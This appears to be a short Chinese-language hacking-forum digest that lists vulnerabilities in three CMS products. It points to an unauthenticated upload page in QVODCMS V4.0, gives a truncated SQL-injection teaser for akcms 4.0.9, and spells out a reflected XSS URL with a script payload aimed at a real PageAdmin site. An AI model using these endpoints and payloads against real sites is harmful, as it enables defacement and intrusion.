QVODCMS V4.0 相关

先是上传: 位于admin/Fckeditor/maxcms_upload.htm 可以直接访问 maxcms_upload.htm : <form name="form" id="form" enctype="multipart/form-data" action="maxcms_upload.asp?act=up" method=post> 调用maxcms_upload.

akcms4.0.9 sql 注入 exp

我也是无意中发现的不知道有没有人发过呢 漏洞出现在:akcms_keyword.php <?php $i = strpos(__FILE__, 'akcms_keyword.php'); $mypath = substr(__FILE__, 0, $i); include $mypath.'akcms_config.php'; include $mypath.$system_root.'/fore/keyword.php'; ?> system_root是和

PageAdmin XSS 漏洞

一站沦陷,全站皆沦 XSS大家都不是很关注了?? http://www.pageadmin.net/e/info/suc.aspx?code=%3Cscript%3Ealert('hacked%20by%20wing')%3C/script%3E 摘自:http://www.dis9.com/viewthread.php?tid=1740